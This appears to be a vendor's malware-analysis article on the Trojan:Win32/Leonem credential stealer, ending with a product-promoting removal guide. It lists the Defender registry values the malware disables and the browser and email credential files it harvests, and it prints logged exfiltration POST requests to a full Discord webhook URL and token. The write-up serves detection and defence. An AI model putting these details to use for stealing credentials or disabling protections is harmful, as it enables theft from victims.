Trojan:Win32/Leonem is a spyware that targets any login data on a compromised system, including saved data in browsers and email clients. It primarily spreads through malicious documents or disguised as legitimate software.
Trojan:Win32/Leonem Overview
Trojan:Win32/Leonem is the detection name used by Microsoft Defender to identify spyware. It’s a classic example of this malware type, which aims at stealing sensitive information from a victim’s system. In addition to its main function, it can also operate as a malware dropper, i.e. deliver other malware. In terms of its core functionality, Leonem can carry out activities like keylogging and collecting sensitive data (logins, browser passwords, browser history, cookies, cache, etc.). It also seeks other stored login credentials, stored in the compromised system, including those in email clients.
As for the payload, Leonem Trojan is capable of downloading additional malicious components. Most often, it deploys ransomware and backdoors, though its capabilities are not limited to these threats. This malware typically spreads through malicious attachments in phishing emails or bundled add-ons with legitimate software from untrustworthy sources. Once launched on the system, Trojan:Win32/Leonem attempts to disable security software and modify system settings to ensure persistence by running each time the operating system boots.
Technical Analysis
Let’s now take a deeper analysis of the threat on an infected system. Since it is a classic information stealer, it has a rather predictable behavior pattern. The malware’s initial actions focus on detecting sandbox environments, debuggers, or virtual machines. To do this, Leonem leverages the following legitimate processes:
%windir%\System32\svchost.exe -k WerSvcGroup
wmiadap.exe /F /T /R
%windir%\system32\wbem\wmiprvse.exe
"%windir%\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
Leonem begins its attack by detecting sandbox environments, debuggers, or virtual machines to evade analysis and detection by security professionals. It leverages legitimate Windows processes such as svchost.exe -k WerSvcGroup, wmiadap.exe, wmiprvse.exe, and aspnet_compiler.exe. By utilizing these standard system processes, the malware can perform its checks discreetly without raising immediate red flags. Specifically, it retrieves BIOS information using WMI queries targeting Win32_Bios and Win32_NetworkAdapter, gathering details about the system’s hardware configuration.
By exploiting the aspnet_compiler.exe process and querying hardware properties via WMI, Leonem effectively masks its malicious activities under the guise of normal system operations. This approach not only helps it avoid detection but also allows it to gather valuable system information that can be used to tailor subsequent stages of the attack or to identify high-value targets. The malware’s ability to blend in with legitimate processes underscores the importance of advanced threat detection mechanisms that can identify unusual behavior patterns even when standard system tools are being used.
Leonem retrieves BIOS information using WMI queries, specifically targeting Win32_Bios and Win32_NetworkAdapter. Additionally, it exploits the aspnet_compiler.exe process and queries hardware properties via WMI. Among other things, it inspects specific registry values and files, including:
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\System\GpSvcDebugLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\safer\codeidentifiers\Levels
C:\Windows\Microsoft.NET\Framework\v4.0.30319\config\machine.config
In addition to detecting the virtual environment, the malware generates a system fingerprint to uniquely identify the infected system.
Next, the malware assesses the presence and status of installed anti-malware solutions. If Microsoft Defender is enabled on the system, the malware attempts to turn it off. This also allows the malware to establish persistence within the system. For all this, Leonem abuses the following legitimate processes and checks the following key values and system locations:
C:\Windows\system32\services.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
C:\Windows\system32\SecurityHealthService.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\DisableAntiVirus
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection\DisableScriptScanning
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection\MpEngine_DisableScriptScanning
Leonem generating a unique system fingerprint to identify the infected machine. This allows it to track infections and potentially avoid redundant attacks on the same system. It then assesses the presence and status of installed anti-malware solutions, specifically targeting Microsoft Defender. If Microsoft Defender is enabled, Leonem attempts to disable it by abusing legitimate system processes such as services.exe and svchost.exe with specific parameters. It also checks and modifies critical registry keys associated with Microsoft Defender, aiming to turn off features like real-time protection and script scanning.
By manipulating these system processes and registry keys, Leonem effectively masks its malicious activities under the guise of normal system operations. Disabling Microsoft Defender’s security features not only facilitates its initial intrusion but also helps it establish persistence within the system without detection. This strategic approach highlights the malware’s sophistication in evading security measures and underscores the importance of robust defenses that can monitor and protect critical system components from such exploitation.
Data Collection
After all the checks, Trojan:Win32/Leonem initiates its primary operation: data collection. It gathers passwords and session tokens from browsers, email clients, and other applications that keep auth details locally. In addition, the malware creates a DirectInput object, enabling it to function as a keylogger, i.e. capture all text from the keyboard. It specifically targets the following file path:
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
C:\Users\\AppData\Local\360Chrome\Chrome\User Data
C:\Users\\AppData\Local\Chromium\User Data
C:\Users\\AppData\Local\Mailbird\Store\Store.db
C:\Users\\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
C:\Users\\AppData\Local\Microsoft\Edge\User Data\Login Data
C:\Users\\AppData\Local\Tencent\QQBrowser\User Data\Default\EncryptedStorage
C:\Users\\AppData\Local\Torch\User Data
C:\Users\\AppData\Local\UCBrowser\
C:\Users\\AppData\Roaming\Mozilla\Firefox\Profiles\1hmu7354.default-release\logins.json
C:\Users\\AppData\Roaming\Mozilla\Firefox\Profiles\1hmu7354.default-release\signons.sqlite
C:\Users\\AppData\Roaming\Mozilla\Firefox\profiles.ini
C:\Users\\AppData\Roaming\Mozilla\SeaMonkey\profiles.ini
C:\Users\\AppData\Roaming\Opera Mail\Opera Mail\wand.dat
C:\Users\\AppData\Roaming\Thunderbird\profiles.ini
After completing its initial checks and disabling security measures, Trojan:Win32/Leonem shifts focus to its primary objective: data collection. The malware targets a wide range of applications that store authentication details locally, such as web browsers and email clients. By accessing specific file paths associated with these applications, Leonem extracts passwords, session tokens, and other sensitive information. Notably, it also creates a DirectInput object to function as a keylogger, capturing all keystrokes entered by the user. This allows the malware to harvest credentials and personal data that may not be stored on the system, including information entered into secure websites or applications.
The file paths targeted by Leonem include directories for browsers like Google Chrome, Microsoft Edge, Mozilla Firefox, and lesser-known browsers such as 360Chrome and QQBrowser. It also focuses on email clients like Mailbird and Thunderbird. By accessing files like Login Data, logins.json, and profiles.ini, the malware can retrieve stored login credentials and session details. The collected data is obtained in both plain text and hashed formats, increasing the chances of successfully extracting usable information. This comprehensive data collection strategy underscores the malware’s sophistication and the importance of securing local application data to prevent unauthorized access.
Data Exfiltration
At the final stage of the attack, Trojan:Win32/Leonem sends the gathered data to its command server. The reviewed sample uses Discord webhook for this purpose. Beforehand, the malware sets up TCP connections on ports 443 and 80. This confirms that it attempts to communicate with remote servers to transmit information or receive commands. Below are some of the requests sent to the said webhooks.
POST https://discord.com:443/api/webhooks/1202330946817237022/1d5Ynow6yHbMqcRfr75qQjJVcSQnFlKpV4g5H2hHiKoRW33XeyZHnl-7hxdTf95oiy9f 200
POST https://discord.com/api/webhooks/1202330946817237022/1d5Ynow6yHbMqcRfr75qQjJVcSQnFlKpV4g5H2hHiKoRW33XeyZHnl-7hxdTf95oiy9f 404
The 200 status at the end means that the request was successfully completed, and the 404 on the other hand indicates an error. This likely indicates that the webhook has either been deleted or changed. In addition, the malware utilizes the ip-api.com service to retrieve details about the hosting environment where it is executed. In this way, it tries to determine whether it is running on the server used for hosting or on a regular computer.
How To Remove Trojan:Win32/Leonem?
As we can see, Trojan:Win32/Leonem is a rather serious threat that deactivates Microsoft Defender whenever possible. Therefore, to effectively remove this Trojan, it’s recommended to use a reliable third-party anti-malware solution like GridinSoft Anti-Malware. To eliminate Trojan:Win32/Leonem from your system, follow these steps:
Download and install Anti-Malware by clicking the button below. After the installation, run a Full scan: this will check all the volumes present in the system, including hidden folders and system files. Scanning will take around 15 minutes.
After the scan, you will see the list of detected malicious and unwanted elements. It is possible to adjust the actions that the antimalware program does to each element: click "Advanced mode" and see the options in the drop-down menus. You can also see extended information about each detection - malware type, effects and potential source of infection.
Click "Clean Now" to start the removal process. Important: removal process may take several minutes when there are a lot of detections. Do not interrupt this process, and you will get your system as clean as new.